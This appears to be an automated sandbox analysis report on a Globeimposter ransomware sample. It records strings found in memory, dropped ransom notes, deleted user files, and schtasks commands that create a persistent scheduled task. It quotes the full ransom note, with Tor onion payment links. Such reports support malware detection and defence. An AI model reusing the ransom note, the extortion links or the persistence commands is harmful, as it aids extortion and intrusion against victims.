                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://staging.cortana.ai
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://store.office.cn/addinstemplate
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://store.office.de/addinstemplate
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://tasks.office.com
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000003.494691289.0000000001584000.00000004.00000001.sdmp, de-ch[1].json.7.drString found in binary or memory: https://tcf.cookiepedia.co.uk
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://web.microsoftstream.com/video/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://webshell.suite.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://wus2.contentsync.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://wus2.pagecontentsync.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://www.odwebp.svc.ms
                      Source: notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, read-me.txt27.7.dr, read-me.txt6.23.dr, read-me.txt7.7.dr, read-me.txt4.23.dr, read-me.txt24.7.dr, read-me.txt28.7.dr, read-me.txt4.7.dr, read-me.txt1.15.dr, read-me.txt30.7.dr, read-me.txt13.7.dr, read-me.txt14.7.dr, read-me.txt23.7.dr, read-me.txt.7.dr, read-me.txt11.7.dr, read-me.txt5.7.dr, read-me.txt25.7.dr, read-me.txt9.15.dr, read-me.txt2.23.dr, read-me.txt0.23.dr, read-me.txt3.15.dr, read-me.txt20.7.dr, read-me.txt16.7.dr, read-me.txt5.15.dr, read-me.txt1.7.dr, read-me.txt10.15.dr, read-me.txt8.15.dr, read-me.txt6.7.dr, read-me.txt18.7.dr, read-me.txt26.7.dr, read-me.txt0.15.dr, read-me.txt7.15.dr, read-me.txt15.7.dr, read-me.txt6.15.dr, read-me.txt1.23.dr, read-me.txt3.23.dr, read-me.txt5.23.dr, read-me.txt.23.dr, read-me.txt2.7.dr, read-me.txt8.7.dr, read-me.txt.15.dr, read-me.txt22.7.dr, read-me.txt12.7.dr, read-me.txt7.23.dr, read-me.txt0.7.dr, read-me.txt10.7.dr, read-me.txt9.7.dr, read-me.txt29.7.dr, read-me.txt3.7.dr, read-me.txt21.7.dr, read-me.txt4.15.dr, read-me.txt19.7.dr, read-me.txt2.15.dr, read-me.txt17.7.drString found in binary or memory: https://www.torproject.org/
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Low\read-me.txtJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected Globeimposter RansomwareShow sources
                      Source: Yara matchFile source: 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 3176, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\Public\AccountPictures\read-me.txt, type: DROPPED
                      Found ransom note / readmeShow sources
                      Source: C:\read-me.txtDropped file: All your files are Encrypted!For data recovery needs decryptor.How to buy decryptor:----------------------------------------------------------------------------------------| 1. Download Tor browser - https://www.torproject.org/ and install it.| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV | 3. Create Ticket----------------------------------------------------------------------------------------Note! This link is available via Tor Browser only.------------------------------------------------------------orhttp://helpqvrg3cc5mvb3.onion/Your ID67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A072 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 106E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F579 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74Jump to dropped file
                      Modifies existing user documents (likely ransomware behavior)Show sources
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeFile moved: C:\Users\user\Desktop\EOWRVPQCCS.jpg
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeFile deleted: C:\Users\user\Desktop\EOWRVPQCCS.jpg
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeFile moved: C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeFile deleted: C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeFile moved: C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png

                      System Summary:

                      barindex
                      Source: Mm7Yq5V7Lu.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00922F861_2_00922F86
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_0129C2F01_2_0129C2F0
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_01299A201_2_01299A20
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00402C517_2_00402C51
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004032137_2_00403213
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004028B77_2_004028B7
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00407F1D7_2_00407F1D
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004037AA7_2_004037AA
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004021B47_2_004021B4
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00407DBA7_2_00407DBA
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00ED2F867_2_00ED2F86
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00542F8610_2_00542F86
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_06EC004010_2_06EC0040
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_06EC034810_2_06EC0348
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00D4C2F010_2_00D4C2F0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00D49A2010_2_00D49A20
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_009E2F8612_2_009E2F86
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0726034812_2_07260348
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0726004012_2_07260040
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_02C4C2F012_2_02C4C2F0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_02C49A2012_2_02C49A20
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708E5B012_2_0708E5B0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_070864C812_2_070864C8
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708538812_2_07085388
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_07087BAB12_2_07087BAB
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_07088A3012_2_07088A30
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_070870C312_2_070870C3
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708AFB012_2_0708AFB0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708AFC012_2_0708AFC0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708643812_2_07086438
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708646512_2_07086465
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_070864B912_2_070864B9
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708ACEB12_2_0708ACEB
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708ACF812_2_0708ACF8
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_07081BB012_2_07081BB0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708AA9012_2_0708AA90
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708AAA012_2_0708AAA0
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708990812_2_07089908
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708991812_2_07089918
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708B15B12_2_0708B15B
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708595F12_2_0708595F
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_0708897712_2_07088977
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_070879DB12_2_070879DB
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004023D5 NtQueryVirtualMemory,7_2_004023D5
                      Source: Mm7Yq5V7Lu.exeBinary or memory string: OriginalFilename vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.339288823.0000000007630000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.337914765.0000000003E74000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000000.299036357.0000000000922000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.337673207.0000000003C29000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.339244626.00000000074D0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.333686175.0000000002D7D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.331874084.0000000002C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exeBinary or memory string: OriginalFilename vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000002.587186936.0000000000ED2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exeBinary or memory string: OriginalFilename vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000A.00000002.391437529.0000000003B84000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000A.00000002.387579140.0000000000542000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000A.00000002.389485153.0000000002A8F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000A.00000002.394056662.0000000006D00000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000A.00000002.389216756.0000000002931000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exeBinary or memory string: OriginalFilename vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000000.373596980.00000000009E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419600548.0000000002F2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.424412548.0000000006FE0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.424525416.0000000007090000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419056283.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.417850975.000000000113A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.421269044.0000000004024000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000E.00000000.380493928.0000000000252000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 0000000F.00000000.383177888.0000000000F52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000014.00000000.396969026.0000000000272000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000015.00000000.400699791.0000000000342000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000016.00000000.405175542.0000000000332000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe, 00000017.00000002.587364945.00000000006B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exeBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exe.7.drBinary or memory string: OriginalFilenameZYgIA.exeJ vs Mm7Yq5V7Lu.exe
                      Source: Mm7Yq5V7Lu.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Mm7Yq5V7Lu.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Mm7Yq5V7Lu.exeVirustotal: Detection: 30%
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile read: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeJump to behavior
                      Source: Mm7Yq5V7Lu.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe "C:\Users\user\Desktop\Mm7Yq5V7Lu.exe"
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe "C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe"
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp9002.tmp
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe "C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmpB7BE.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmpJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp9002.tmpJump to behavior
